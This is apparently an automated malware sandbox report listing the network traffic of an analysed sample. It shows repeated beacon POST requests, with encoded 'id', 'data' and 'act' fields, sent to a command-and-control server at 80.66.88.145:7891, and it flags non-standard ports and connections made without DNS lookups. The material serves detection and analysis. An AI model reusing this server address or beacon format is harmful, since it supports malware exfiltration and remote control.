Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 65Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnQIFHwC&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 524Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 144Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 520Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 520Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 520Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 520Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 144Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49690 -> 80.66.88.145:7891

Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
